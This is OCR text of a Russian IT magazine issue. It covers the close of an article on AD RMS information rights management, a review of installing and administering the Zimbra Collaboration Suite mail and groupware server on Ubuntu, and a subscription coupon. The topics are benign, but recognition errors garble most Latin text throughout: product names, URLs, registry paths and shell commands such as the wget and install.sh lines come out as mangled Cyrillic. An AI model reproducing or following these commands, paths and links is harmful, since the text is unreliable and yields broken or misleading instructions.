автор создает файл и задает набор разрешений на использование 
файла. Приложение шифрует файл симметричным ключом, кото- 
рый, в свою очередь, шифруется открытым ключом АБ КМ5 сервера. 
Зашифрованный ключ помещается в «риЫізЫп^ Нсепзе», которая 
привязывается к файлу. Лицензию может выдать только АБ КМ5 
кластер, к которому принадлежит автор. Если кластер автору недо- 
ступен, то копия симметричного ключа шифруется с помощью СЬС. 

3. Файл любым способом доставляется от автора получателю. На 
компьютере получателя должен быть ВАС. Если его нет, то он изда- 
ется АЭ ВМ5 кластером. 

4 . Для работы с файлом клиентское приложение отправляет запрос на 
«и$е Исепзе» кластеру АБ ВМ5, издавшему «риЫізЫп^ Іісепзе». В запро- 
се отправляется сертификат учетной записи получателя и «риЫізЫп^ 
Исепзе», которая содержит ключ шифрования защищенного файла. 
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Полезные ссылки по теме 



Безопасное совместное 
использование документов 
«как сервис» 



Модным облачным технологиям нашлось место и среди 
ОРМ- решений. Одно из них — это 5аа5 решение ѴѴаІсМ ох 
от калифорнийской компании Сопіісіеіа, которое хостится на 
АтагопѴѴеЬЗегѵісез. ѴѴаІсЬ йох Зесиге іііе збагіпд позволяет 
автору загрузить файл на сайт ѵѵѵѵѵѵ.ѵѵаІсЬсІох.сот . задать на него 
разрешения (Ѵіе\д/, Ргіпі, ЕсІ И;, РогѵѵагсІ, ЗроШдЫ и Сору/Разіе), 
указать срок действия разрешений и настроить журналирова- 
ние обращений кдокументу. Все разрешения можно изменять 
стечением времени. После загрузки файл преобразуется во 
флеш-ролик, с которым пользователь может делать толь ко то, 
что разрешил автор. При работе через приложения, отличные 
от браузера, например, офисные продукты, требуется установка 
плагина. 

Для получения доступа кдокументу необходимо указать свой 
е-таіі, единожды подтвердив его переходом по ссылке в письме. 
Па роль для аутентификации не применяется, а идет привязка к 
конкретному компьютеру. К неудобствам можно отнести то, что 
поперек всего текста будет показываться свой же е-таіі. Все 
общение с сервером идет по НТТР5, файлы шифруются АЕ5. При 
переходе кдругому приложениютекстфайла размывается, что, 
в принципе, не мешает сделать скриншоте помощью горячих 
клавиш (рис. 4). Для защиты отскриншотов используется разре- 
шение ЗроШдЫ, которое оставляет видимой небольшую область 
текста, тем самым сильноудлиняя сам процесс и доставляя 
неудобства читателю. 

В общем, решение довольно продуманное, но надо учитывать, что 
все конфиденциальные файлы передаются третьей стороне. Если 
кобещаниям о сохранении конфиденциальности загруженных 
документов компания относится также, как к использованию 
клиентских е-таіі, то теряется весь смысл этого интересного сер- 
виса (при указании е-таіі для аутентификации сообщается, что он 
не будет использован для отправки нежелательных сообщений, 
но через несколько минут на почту приходит письмо от консуль- 
танта Сопіісіеіа с предложением рассказать больше о продуктах 
компании). 



5 . Сервер проверяет, что получатель авторизован для работы с до- 
кументом. Затем расшифровывает ключ шифрования файла своим 
закрытым ключом, перешифровывает его с использованием откры- 
того ключа получателя и отправляет пользователю «изе іісепзе», 

в которую могут быть включены дополнительные ограничения 
(например, версия ОС или срок действия). 

6 . На стороне клиента происходит проверка сертификатов, списков 
отзыва, цепочек доверия сертификатов, и если все проверки прохо- 
дят успешно, то пользователь получает доступ к файлу. 

Настройка и работа с АОШ5 

Для работы АОКМЗ требуются следующие компоненты: 

• Асйѵе Пігесюгу Потаіп Зегѵісез (АПОЗ) хранит информацию об 
ІЖЬ для доступа к кластеру АО КМ5 в Зегѵісе Соппесйоп Роки (5СР) 
и проводит аутентификацию клиентов. Сервер АО КМ5 обязательно 
должен входить в домен. 

• Для хранения конфигурационной информации и журналирования 
используется Місгозой 5<ЗЬ Зегѵег или база, встроенная в ѴѴІпсІоѵѵз 
Зегѵег 2008. 

• На первом сервере в домене, на котором устанавливается роль АО 
КМ5, обязательно должна быть установлена роль ѴѴеЪ Зегѵег (115) . 



• Іесбпе1.тісго50Й.сот/еп-ц5/ІІЬгагѵ/сІсІ772697(ѴѴ8.1 ОІ.азрх — 
возможности использования различных версий офисных пакетов 
для создания и работы сзащищенными документами. 

• \л/\д/\д/.хгт1.огд — еХіепзіЫе РідЫз Магкир І_апдиаде — язык, 
используемый для создания шаблонов АРРМ5. 

• Ознакомиться с подробными сравнениями различных РРІ_- и 
ІРМ-решений можно в нескольких источниках: «РІ_Р-реше- 
ния на российском рынке» ( ѵѵѵѵѵѵ.ЬѵІетад.ги/а гіісіез/сіеіаіі. 
рбр?ІР=1 6748 ). «ОгоирТезЕ йРМ & йЕРіооІз» ( ѵѵѵѵѵѵ.зстадагіпеиз. 
сот/д гои рІезІ-сІгт--сІІр-ІооІ5/ргіпІд гои ріезі/і 82/ ]. «Как сориен- 
тироваться на рынке систем РІ_Р» ( ѵѵѵѵѵѵ.спеѵѵз.ги/геѵіеѵѵзЛгее/ 
зесигіІѵ2009/агІісІез/сІр1.зЫтІ ]. 



• Для ѴѴіпсіоѵѵз ХР, ѴѴіпсіоѵѵз 2000 и ѴѴІпсІоѵѵз Зегѵег 2003 для работы с 
АЭ КМ5 требуется установка Місгозобс ѴѴІпсІоѵѵз Ш^Ьсз Мапа^етепі: 
Зегѵісез СНепй 

Установка АЭ КМ5 осуществляется путем добавления серверной 
роли (рис. 3), состоящей из двух компонентов: непосредственно 
Асйѵе Оігессогу Ш^Ьсз Мапа^етепі: Зегѵісез и ШепйСу Ребегайоп 
Зиррогц который необходим для интеграции с АЭ ЕЗ и дает воз- 
можность клиентам работать с АБ КМ5 при наличии федеративных 
отношений доверия. Не рекомендуется добавлять роль АО КМ5 на 
контроллер домена. Для установки АБ КМ5 требуются права ло- 
кального администратора, для регистрации Зегѵісе Соппесйоп Роіпс 
необходимы права Ешегргізе Асітіпз. 

Перед установкой необходимо создать учетную запись, с правами 
по умолчанию и не истекающим сроком действия пароля, от имени 
которой будет запускаться служба АО КМ5. Для повышения отказо- 
устойчивости в случае восстановления или миграции рекоменду- 
ется создавать записи типа А (или СЫАМЕ) на БЫЗ-сервере для 1ЖЬ 
кластера АБ КМ5 и ЗС^Ь-сервера, на котором хранятся базы АБ КМ5. 
АБ КМ5 поддерживает шаблоны (Кі^інз Роіісу Тетріасез), с помо- 
щью которых можно контролировать права, которые получают 
пользователи и группы при работе с документами, защищенными 
шаблоном. При создании документов автор может выбирать, 
какой шаблон будет применен, тем самым упрощается задание 
разрешений. Шаблоны хранятся либо в конфигурационной 
базе данных, либо в папке, которая может быть использована 
оШіпе-пользователями. Для того, чтобы шаблоны были доступны 
оШіпе-пользователям, необходимо экспортировать шаблоны 
через консоль АО КМ5 в общую папку, перенести шаблоны на кли- 
ентские компьютеры и задать соответствующий путь в реестре (в 
зависимости от используемого ПО необходимо настраивать разные 
ветки, например, для ОШсе 2007 надо изменить ключ реестра НКЕУ_ 
СІІККЕПТ_ІІ5ЕК\5ОРТѴѴАКЕ\Місго5оГі:\ОШсе\12.0\Соттоп\ 
ПКМХАбтіпТетрІаіюРаШ) . 

Итоги 

ОЙР- и ІКМ-решения позволяют значительно снизить вероят- 
ность раскрытия конфиденциальных данных, особенно когда 
они используются совместно. Но ни одно техническое решение 
не сможет помешать инсайдеру, у которого есть доступ к данным, 
передать их на сторону. АО КМ5, если разобраться в принципах 
его работы и всех выдаваемых сертификатах, позволяет быстро 
развернуть ІКМ-решение , работающее с наиболее популярными 
форматами файлов, которое еще и позволяет выполнить автома- 
тическую классификацию данных и создать шаблоны, которые 
легко применимы в доменной инфраструктуре. Кроме того, АО 
КМ5 поддерживает интеграцию с ПЬР-решениями, например, 
КЗАОЬР.--- 
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■ ■ Сергей «дгіпсіег» Яремчук дгіпгіеггаиа.^т, Іих.іп.иа 



пс^ёссче нд жу 

2ітЬга: обзор популярного сервера 
коллективной работы 

Системы групповой работы по праву занимают одно центральных мест среди ти$1 Ьаѵе 
приложений в организациях разных типов. Решения класса «все в одном» дают возможность 
пользователям обмениваться сообщениями, документами, планировать задачи и многое другое. 
Продукт ІітЬга СоІІаЬогаІіоп Зиііе (2С5), распространяемый под свободной лицензией, успешно 
конкурирует со многими проприетарными аналогами. 



Возможности 2С5 

Проект калифорнийской компании 2ітЪга Іпс. громко заявившей о 
себе в 2007 году, сразу привлек к себе внимание. И хотя первые версии 
по функциональности не дотягивали до большинства имеющихся тогда 
ОрепЗоигсе решений, заложенный в нем потенциал был огромен, а 
поэтому интересен многим админам. В результате в сентябре 2007 года 
компания была выкуплена УаЬоо ! , а в начале 2010 перешла к ѴМѵѵаге. 
Сегодня в 2ітЪга входит стандартный набор приложений, необходимых 
для любой системы коллективной работы. В первую очередь это почто- 
вый сервер, позволяющий пользователям работать с почтой с помощью 
клиентских программ поддерживающих протоколы РОР/РОР5 и ІМАР/ 
ІМАР5 или через веб-интерфейс. Обеспечивается фильтрация спама и 
антивирусная проверка почты при помощи СІатАѴ. К слову, простота 
развертывания почтового сервиса была оценена еще в первых релизах 
прод укта, поэтому многие админы вместо установки разношерстной 
связки сервисов и обеспечения их совместной работы, сразу ставили 
2ітЪга. Пользователь может настроить сбор почты с другихящиков, 
сообщения при этом будут копироваться на сервер 2ітЪга, поддерживается 
работа с несколькими доменами. 

2ітЪга включает в себя также сервис мгновенного обмена сообщениями 
(ІаЪЪег) , календарь с возможностью планирования событий, систему 
управления контактами, систему обмена документами с полноценным 
ѴѴУ5ІѴѴУС редактором 2ітЪга Поситеш. Последний поддерживает 
форматы КТЕ, НТМЬ, работу с буфером обмена, и что особенно важно 
редактор понимает кириллические шрифты. Предусмотрена возмож- 
ность вставки таблиц и изображений, поэтому 2ітЪга Поситеш может 
удовлетворить потребности большинства пользователей, без необходи- 
мости дополнительной установки офисного пакета. Проблем с набором 
или чтением документов у пользователя точно не будет. Любой документ 
можно расшарить, чтобы к нему могли получить доступ другие участники 
(для доступа нужно знать ІЖЬ) . Адрес документа можно отправить по 
е-таіі или публиковать в виде КЗЗ/Ают. Реализован полноценный 
поиск по документам, вложениям и текстам е-таіі. Для удобства сообще- 



ниям можно присваивать тэги, группируя их, например по назначению. 
Также 2ітЪга обеспечивает двустороннюю синхронизацию со многими 
мобильными устройствами (ѴѴіпсіо\ѵ5 МоЪіІе, іРйопе, Иокіа Е и так да- 
лее), среди веб-интерфейсов доступен и упрощенный вариант, предна- 
значенный для доступа с мобильных устройств через медленные каналы. 
Учетные записи пользователей можно хранить локально, а также в 
любом ШАР сервере, в том числе и домене АсйѵеПігесІогу. 

Разработчики предоставили специальное АРІ, позволяющее создавать 
дополнительные плагины называемые гітіещ существенно расши- 
ряющие возможности 2ітЪга. Используя зимлеты достаточно просто 
интегрировать в 2С5 продукты и сервисы, разработанные третьими 
лицами или новые функции, создав единую среду, обладающую нужной 
функциональностью. И кстати именно благодаря зимлетам 2ітЪга полу- 
чил такую популярность и функциональность. В стандартной поставке 
сервера идет несколько десятков зимлетов, по умолчанию устанавлива- 
ется лишь малая часть из них. 

Как водится в таких случаях приложение использует клиент-серверную 
архитектуру. Серверная часть 2ітЪга Зегѵег написана на Лаѵа, является 
РОРЗ/ІМАР сервером, и базируется на нескольких ОрепЗоигсе проектах, 
среди которых п§іпх, Арасйе Ілісепе, ОрепШАР, МуЗС^Ь, Розйтх, РОРЗ/ 
ІМАР4 прокси РегсШоп, СІатАѴ, БЗРАМ и некоторые другие. 

Веб-клиент 2ітЪга ѴѴеЪ СНепІ — обеспечивает интерактивный, удобный 
и что не менее важно локализованный веб-интерфейс для получения 
доступа к данным пользователя. Построен с применением технологии 
АЗАХ, что упрощает взаимодействие пользователя и выполнение ряда 
операций. Например, достаточно навести курсор на дату в календаре, 
как будет высвечены все события дня, если навести мышку на адрес в 
сообщении или контакте, сразу будет показана схема проезда, щелчок на 
телефонном номере запустит Зкуре или Екі§а, позволяя сразу поговорить 
с этим человеком и так далее. 

И, наконец, клиент совместной работы 2ітЪга Оезктр, который обеспе- 
чивает подключение к серверу и синхронизацию данных (почта, контак- 
ты, календарь и так далее), может использоваться в качестве почтового 
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клиента для любого ІМАР/РОРЗ почтового сервиса. 

2С5 предлагается в трех версиях: Ореп Зоигсе Ебійоп, 
Ыей/ѵогк Ебійоп (Зііагііег, Згапбагб и Ргоіеззіопаі) и 2ітЪга 
Аррііапсе (Вазіс, Згапбагб) . Первая распространяется 
свободно под ОрепЗоигсе-подобной 2РЬ лицензией 
(2ітЪга РиЫіс Ьісепзе) . Поддерживает неограниченное 
количество пользователей, и хотя имеет некоторые 
ограничения по сравнению с платными версиями, но 
они никоим образом не мешают использованию 2ітЪга 
в организациях малого и среднего размера. Несколько 
сокращены инструменты администратора, отсутствует 
возможность синхронизации с внешними устройствами 
М3 Оибоок, отсутствует встроенный механизм резер- 
вного копирования и восстановления, невозможность 
работы в кластере и другие (см. таблицу на гітЬга. сот/ 
ргобисй /сотраге ргобисй.Ьйп!) . Хотя отчаиваться не 
стоит, некоторые "пропущенные" в ОрепЗоигсе версии 
вопросы давно уже решены мощным комюнити проекта. 
Так, например в ѴѴікі можно найти несколько вариантов 
скриптов, предназначенных для резервирования теку- 
щей установки 2ітЪга. 

С Ореп Зоигсе Есіійоп мы и будем знакомиться далее. 



^новка 2С5 ОрепЗоигсе 



На момент написания этих строк актуальной является вер- 
сия 6.0.8, которую мы и будем далее устанавливать в ІЛэипйі 
10.04 ЬТЗ. Серверная часть доступна для х32 и х64 битных 
версий Ілпих (Кеб Нас Епсегргізе, Ребога, ЦЪипйі, ПеЪіап, 
Мапбгіѵа, ЗІІЗЕ Ілпих) и Мае 05 X. Кроме этого доступны 
исходные тексты и последние патчи. К слову из ІЛэипйі 
официально поддерживается установка на 6.06 и 8.04 ЕГ5, 
версия 10.04 пока находится в бета-стадии и официально 
пока не поддерживается. Но на самом деле это не говорит, 



что это невозможно. Перед установкой следует правильно 
настроить разрешение имен на ЭЙЗ сервере, мастер уста- 
новки будет проверять А и МХ и в случае неудачи завершит 
работу с ошибкой. 

Сам процесс установки очень прост и если все требования 
выполнены, займет не более 10 минут времени. 

Качаем архив, под требуемую платформу. В моем примере 
используется 64-битная версия ОС. 




[ НТТР://ѴѴѴШ 

I ■ 



> Ііпкз 

• Сайт2ітЬга — 

ДтЬга.сот 



$ мдеВ -с ШВр : / /1і1ез2 . гітЪга . сот/ 
бошііоабэ/б . О . 8_СА/гсз-6 . О . 8_СА_2 661 . 
ІІВШТІІ8_64 .20100820044710 . Вдг 

Распаковываем и запускаем установочный скрипт. 



• Таблица сравнение 
версий 2ітЬга — 
ЛтЬга.сот/ргосІисІз/ 
сотраге ргосіисіз. 
іЛті 



$ Саг Х 2 ѴІ 2 СЗ -6 . 0 . 8_СА_2 661 . 
йВШТІІ8_64 .20100820044710 . Вдг 

$ ссі 2 с з — 6 . 0 . 8 СА 2 661. 

ІІВШТІІ8_64 .20100820044710 



• Перенос пользова- 
тельских аккаунтов — 
уѵікі.гітЬга.сот/ѵѵікі/ 
Цзег Мідгаііоп 



Так как ІЛэипйі 10.04 не поддерживается, используем допол- 
нительный параметр «-ріабогт-оѵеггібе»: 

$ . /іпзВаІІ . зЪ. --рІаВТогт-оѵеггісІе 

Скрипт проверит наличие предыдущих установок 
2ітЪга, и предложит принять условия лицензии. Затем 
важная часть проверка записи имени узла в /ей/Ьозй 
и зависимостей. Сама программа установки ничего из 
репозитария не ставит, это нужно сделать админу. Если 
какого-то пакета не будет найдено, напротив его имени 
выводится МІ53ШС, а скрипт по окончании анализа за- 
канчивает свою работу. Доустанавливаем что не хватает, 
и повторяем. 




>Мо 

Список портов 
которые необходимо 
открыть в бранда- 
мауэре для работы 
2ітЬга: 22, 25, 80, 

1 10, 143,389,443,993, 
995,7025. 
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Настройка класса обслуживания 

$ зисіо ар^-деЬ іпзііаіі ІіЬрсгеЗ 1іЬдшрЗс2 ІіЬдтрЗ-сІеѵ 

зуззЬаЬ 1іЬехра1:1 ѵ^деЬ 

Если этот шаг пройден нормально, скрипт проверяет наличие пакетов 
в архиве и запрашивает разрешение на установку каждого (всего их 
1 1) . По умолчанию мастер предлагает установить все компоненты, за 
исключением гітЬга-тетсасІіесІ и гітЬга-ргоху (прокси РОРЗ, ІМАР и 
НТТР) . Причем, если выбран гітЬга-ргоху, то тетсасЬесі будет установ- 
лен автоматически. Далее выдается запрос на разрешение модификации 
системы. Соглашаемся, и начинается собственно процесс установки 
пакетов и настройки параметров. Теперь скрипт запросит БЫЗ сервер 
на предмет имени узла 2ітЪга, если ответ (А и МХ) не будет совпа- 
дать с записью в /еіс/Ьозіз, последует вопрос о смене. Далее проверка 
конфликта портов и выводится меню установки, в котором можно 
откорректировать любое значение. Особое внимание следует обра- 
тить на пункты, отмеченные несколькими звездочками, это означает 
не настроенный параметр. Как минимум один такой есть — «Абтіп 
Раззѵѵогсі», означающий на отсутствие пароля администратора. Для 
изменения нужного пункта нажимаем соответствующую ему цифру. Так 
чтобы установить пароль, выбираем 3, появляется еще одно меню, ищем 
«Абтіп Раззтжі» и нажимаем цифру (она опять будет подсвечена ***), 
после чего вводим дважды пароль. Чтобы перейти в старшее меню, на- 
жимаем «г», клавишей «з» или «а» сохраняем настройки (скрипт выдаст 
имя файла) и для выхода из меню используем «д». Вот собственно и весь 
процесс установки. Еще некоторое время будут настраиваться сервисы, 
вся информация по установке будет сохранена в /орі:/2ІтЪга/1о§. слову 
убрать 2ітЪга также просто, как и установить. Вначале вводим команду: 

$ . /іпзііаіі . зЬ --ипіпзііаіі 

Затем обязательно удаляем каталог /орг/гітЪга, в нем даже после удале- 
ния сохраняются все настройки. 

Веб-интерфейсы ІітЬга 

После установки серверной части будет доступно два интерфейса. 
Обычные пользователи для работы с почтой, документами и кален- 
дарем должны набирать в браузере ШИ, сервера без указания номера 
порта. При входе можно будет выбрать один из трех вариантов, 
который подходит для разных условий — стандартный (НТМЬ), рас- 
ширенный (АЛАХ) и мобильный телефон. В стандартном варианте от- 
сутствует все, что связано с АЛАХ, то есть встроенная работа с докумен- 
тами, всплывающие подсказки и прочие удобства. Так если выбрать 
созданный документ находящийся в Портфеле его будет предложено 
сохранить на локальном диске или открыть во внешней программе, в 
расширенном сразу откроется редактор. В стандартном интерфейсе 
доступны календарь, задачи, ежедневник, работа с почтой, адресная 




Веб-интерефейс для работы обычного пользователя 



книга и портфель. Разобраться, как работать с пользовательским 
интерфейсом очень просто. Особенно учитывая, что доступна он-лайн 
справка на русском языке, в которой достаточно подробно описаны 
все тонкости работы. Собственно из-за простоты и любят 2ітЪга 
админы, всего пара команд и толковый почтовый сервер развернут. 
Веб-интерфейс администратора «находится» на 7071 порту. Набираем 
в браузере ссылку ЬнрзУ/зегуег. сот: 7071, для входа используем логин 
абтіп и пароль указанный во время установки. 

После входа попадаем во вкладку «Состояние сервера», где показан 
статус всех установленных сервисов. Основное управление находится в 
пяти меню: 

Адреса — управление аккаунтами пользователей, создание алиасов, 
листами распространения и ресурсами, просмотра почты пользователей 
и смена пароля; 

Конфигурация — глобальные настройки доступных возможностей сер- 
вера, тем, глобальные настройки (квоты, длина и время жизни пароля) 
и класс обслуживания, включение и установка гетіеіз и расширений 
администрирования, настройки домена и серверного пула; 

Мониторинг — вывод статуса сервисов и статистики сервера за разный 
период времени (количество сообщений, вирусная и спам активность, 
при необходимости легко можно добавить график загруженности СРІІ, 
отдельного сервиса и так далее) ; 

Сервис — управление почтовыми очеред ями и сертификатами, обнов- 
ление ПО сервера; 

Профили поиска — вкладка содержит несколько шаблонов позволяю- 
щих быстро выполнить поиск с определенными условиями (неактивные, 
блокированные, административные учетные записи и так далее) . 

При таком большом количестве опций, система на самом деле очень 
проста в администрировании, все настройки находятся на своих местах 
и производятся так как ожидаешь, без каких-либо «сюрпризов». Поэтому 
разобраться с управлении человеку, понимающему чего он хочет в итоге 
получить, очень легко. 

После установки в системе присутствует несколько учетных записей — 
администратора, ѵѵікі и обучения спам-фильтра. Чтобы добавить нового 
пользователя достаточно выполнить «Учетные записи -> Создать -» 
Учетная запись» и заполнить пред ложенные поля. Предусмотрен импорт 
с файла в формате С5Ѵ, для этого достаточно выбрать «Другие действия -» 
Групповая подготовка». Файл должен содержать строки — логин, имя и 
пароль, разделенные запятой. Например: 

изег@с!отаіп . сот , пате , раззмогсі 

Если пароль не указан, пользователю будет задан случайный пароль, 
который он должен будет сменить при первом входе. Аналогично просто 
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С2МН, )м,вЙЮ8-И10, 



Гртшо 
П ДІІ»Д.гЬті 



Для пользователей мобильных устройств предусмот- 
рен упрощенный интерфейс 



создаются псевдонимы, списки рассылок и ресурсы. В интернет можно 
найти несколько готовых решений позволяющих произвести миграцию 
почтовых ящиков, календарей и т.п. в 2ітЪга из других систем. Чтобы их 
найти просто вбей в гугле, что-то вроде «Ш 2ітЪга ті§гайоп». Основную 



Управление 2ітЬга из консоли 



Кроме веб-интерфейса, настройками 2ітЬга можноуправ- 
лять и с помощью большого количества команд, выполнять 
которые необходимо под учетной записью 2 ІтЬга. Список всех 
команд доступен в документации на сайте проекта «2ітЬга СІ_І 
Соттапбз» [ гітЬга.сот/сІосз/оз/б.О.З/асІтіпізігайоп аиібе ). 
Например системная команда «зегѵісе гіппЬга зіаіиз» по сути 
обращается к утилите гтсогйгоі 

гтсопЬгоІ (зЬаЬиз I зЬор I зЬагЬ | таіпЬепапсе I зЬагЬир) 

Чтобы обратиться к отдельному сервису просто указываем его 
имя. Поумолчанию идетопрос на локальной системе, нодобавив 
параметр -Н можно указать удаленный сервер. 

Утилита гтассіз позволяет получить данные об аккаунтах, гппргоѵ 
модифицировать данные ЮАР, с его помощью можно например 
настроить алиасы для домена, создать учетные данные и так 
далее. Плюс для каждого сервиса можно найти специфическую 
команду. 

информацию по переносу пользовательских аккаунтов можно получить 
по ссылкам наѴѴікі-проекта Гѵуікі.гітЬга.сот/ткі/Цзег Мі^гайоп) . 

Следует отметить удобство при администрировании большого коли- 
чества серверов и доменов. Так изначально для всех серверов действуют 
установки указанные в двух подпунктах «Конфигурация -» Глобальные 
настройки» и «Конфигурация -» Класс обслуживания». Последние пред- 
ставляют своего рода политики для аккаунтов пользователей, серверов 
и доменов. По умолчанию присутствует один класс (Майк, который и 
наследует сервер или группы серверов 2ітЪга. 

В том случае если для каждого сервера необходимо использовать разные 
параметры, следует создать новый класс сервера, в котором их и указать. 
Настройка класса содержит 7 вкладок, в которых настраиваются воз- 
можности сервера, параметры клиента (НТМЬи АІАХ), поиск, отправка 
и получение почты, отправка получение приглашений календаря, 



доступные темы и модули 2іт1еЦ лимиты ресурсов и многие другие. Сле- 
дует внимательно пройтись по всем вкладкам и выставить параметры в 
соответствии с требованиями. 

Например, в классе сМаик отключена функция Мессенджер отвечающая 
за работу системы мгновенного обмена сообщения, если такой сервис 
нужен, его следует включить. 

Язык интерфейс выбирается автоматически по установкам браузера, 
но в большинстве случаев его лучше сразу зафиксировать во вкладке 
«Настройки -» Язык». Здесь же в подразделе «Параметры еженедель- 
ника» указываем часовой пояс и первый день недели в календаре (по 
умолчанию воскресенье это неудобно) . По окончанию не забываем 
нажать кнопку Сохранить. 

При создании нового домена или редактирования настроек имеюще- 
гося, просто выбираем нужный класс, и все настройки которого будут 
наследованы. Некоторые из них можно затем переопределить в инди- 
видуальном порядке. Аналогично настройки переопределяются для 
каждого отдельного сервера. Например, выбрав вкладку Службы можно 
отключить ненужные сервисы. 

В Глобальных настройках указывается максимальный размер файла 
в Портфеле, список запрещенных расширений файлов, которые будут 
блокироваться, настройки МТА, РОР, ІМАР, взаимодействие с Ехсйап^е 
и другие. 

Таким образом, параметры будут применены в таком порядке: 
Глобальные настройки, Класс сервера и персональные настройки. В 
настройках сервера есть кнопки позволяющие сбросить параметр до 
глобального значения. 

По умолчанию вместе с сервером устанавливается только 6 гітіеіз. Все 
остальные находятся в нескольких каталогах /орг/гітЪга/гітІеіз*. 
Чтобы добавить любой из доступных, следует выбрать ссылку 2іт1еЩ, 
нажать Инсталляция и указать на выбранный гір архив. При следующей 
регистрации пользователя новый гітіеіз (за исключением некоторых) 
появится в списке. В дальнейшем пользователь самостоятельно настраи- 
вает параметры зимлета при помощи контекстного меню. 

Заключение 

Итак, практически не прилагая особых усилий, всего лишь введя 
несколько команд, мы получили полнофункциональный сервер, 
обеспечивающий все необходимые инструменты для организации 
коллективной настройки. В дальнейшем управлять им может любой 
пользователь, не обладающий продвинутыми знаниями по адми- 
нистрированию *піх систем и сетевых сервисов. Используя допол- 
нительные модули расширения можно еще больше нарастить его 
возможности. -й- 
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БУДЬ ХИТРЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! 

СЭКОНОМЬ 800 РУБЛЕЙ НА ГОДОВОЙ ПОДПИСКЕ! 



I ■ 



ВСЕГО 191 РУБЛЕЙ ЗА НОМЕР 



руб с доставкой 
ои цены 



ПОЛУЧИ В ПОДАРОК ОДИН ЖУРНАЛ ДРУГОЙ ТЕМАТИКИ 

Оформив годовую подписку в редакции. 

ты сможешь бесплатно получить один свежий 

номер любого журнала, издаваемого компанией «Гейм Лэнд»: 



ЯНВАРСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 30 НОЯБРЯ. 
ФЕВРАЛЬСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ДЕКАБРЯ. 
МАРТОВСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ЯНВАРЯ. 




Страна Игр Тюнинг 

+ ОѴО Автомобилей 





Хулиган РС Игры Оідііаі РГіоіо Фотомастерская ТЗ Вышиваю Згтпоке 

+ ОѴО + 2 ОѴО + ОѴО + ОѴО крестиком 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 




I ПРИ ПОДПИСКЕ НА комплект журналов 
М Р ЖЕЛЕЗО + ХАКЕР + 2 ОѴО: - ОДИН НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
ь у :|И1 (НА 35% ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) 

Ж* © +БЕСПЛАТНАЯ ПОДПИСКА НА ЛЮБОЙ ЖУРНАЛ НА ОДИН МЕСЯЦ 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 
ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 



ВПИШИ В КУПОН НАЗВАНИЕ ВЫБРАННОГО ЖУРНАЛА, 
ЧТОБЫ ЗАКАЗАТЬ ПОДАРОЧНЫЙ НОМЕР. 



ПОДПИСКА — ЭТО ЛЕГКО! 

1. Разборчиво заполни подписной купон и квитанцию, 

вырезав их из журнала, сделав ксерокопию 
или распечатав с сайта НЦрѴ/зІіор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных документов - купо- 
на и квитанции - любым из этих способов: 

- по электронной почте зиЬзсгіЬейдІс.ги ; 

- по факсу (495) 545-09-06; 

- по адресу 115280, Москва, ул. Ленинская Слобода, 19, Омега 
плаза, 5 эт, офис № 21. 000 Гейм Лэнд. Отдел подписки. 

Еще один удобный способ оплаты подписки на любимое 
издание — в любом из 72 000 платежных терминалах ОІѴѴІ 
(КИВИ) по всей России. 




ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитан- 
ции в редакции. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы про- 
изводите оплату в январе, то журнал будете получать с мар- 
товского номера. 

Единая цена по всей России, доставка за счет издателя. 

Для жителей Москвы (в пределах МКАД) доставка может 
осуществляться курьером «из рук в руки» в течение трех 
рабочих дней с момента выхода номера на адрес офиса 
или на домашний адрес. Этот способ доставки также бес- 
платен для подписчиков. 



Подписка на 6 месяцев с доставкой стоит 1260 рублей (без подарочного журнала). 

Подписка на 6 месяцев без доставки с получением журнала самостоятельно в Москве в точке 
продаж Р-кіо$к рядом с метро Белорусская, ул. Грузинский вал, д.27-31 — всего 648 рублей. 

Получить журнал можно будет у продавца с предъявлением паспорта на имя оформившего подписку в течение недели, 
начиная со следующего дня после дня выхода журнала. 



орпимі П0 БЕСПЛАТНЫМ ТЕЛЕФОНАМ (495) 663-82-77 (ДЛЯ МОСКВИЧЕЙ) И 8-800-200-3-999 (ДЛЯ ЖИТЕЛЕЙ ДРУГИХ РЕГИОНОВ РОССИИ, 
О □ П I/ I ! АБОНЕНТОВ СЕТЕЙ МТС, БИЛАЙН И МЕГАФОН). ВАШИ ВОПРОСЫ, ЗАМЕЧАНИЯ И/ИЛИ ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ 
ПРОСИМ ПРИСЫЛАТЬ НА АДРЕС 1МР0Й0ГС.РЦ ИЛИ ПРОЯСНЯТЬ НА САЙТЕ 5Н0Р.6І.С.КЦ В РАЗДЕЛЕ «ПОДПИСКА». 



ПОДПИСНОЙ КУПОН 



ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 


» 


ЕЛ на 6 месяцев 
| | на 12 месяцев 
начиная с 


20 г. 


| | прошу выслать бесплатный 
номер журнала 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

Г~1 на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 



сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 



свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 
